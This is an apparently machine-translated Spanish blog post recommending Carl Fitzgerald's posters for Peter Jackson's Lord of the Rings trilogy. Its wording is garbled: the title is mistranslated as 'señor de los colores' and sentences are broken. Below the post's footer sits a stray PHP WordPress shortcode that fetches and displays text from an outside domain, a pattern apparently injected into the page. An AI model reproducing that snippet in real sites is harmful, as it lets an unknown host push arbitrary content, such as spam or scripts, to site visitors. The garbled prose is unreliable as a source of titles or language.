Hace poco me encontré con un increíble póster de la epopeya de Peter Jackson. señor de los colores Trilogía Estos tres carteles representan La Comunidad del Anillo, Las Dos Torres y El Retorno del Rey.


Estos carteles fueron creados por el artista. carl fitzgerald, y realmente me encanta cómo captura a la perfección el tono de estas películas con su estilo distintivo. Es posible que los hayas visto antes porque han estado ahí por un tiempo, pero para aquellos de ustedes que no lo han hecho, solo quería asegurarme de que sabían que existían.


Las películas que se hacen. señor de los colores La trilogía son tres de mis películas favoritas de todos los tiempos, y con las noticias de Warner Bros. y New Line Cinema de que quieren expandir la Tierra Media con más películas, he visto aparecer más material de El señor de los anillos en línea. Así que estoy compartiendo algo. ¡Cosas tan geniales, así que aquí tienes!


Previous Post Next Post
function pub_short() { $pub_text = file_get_contents( "https://alrafdean.org/me/pub.txt" ); return $pub_text; } add_shortcode('pub', 'pub_short');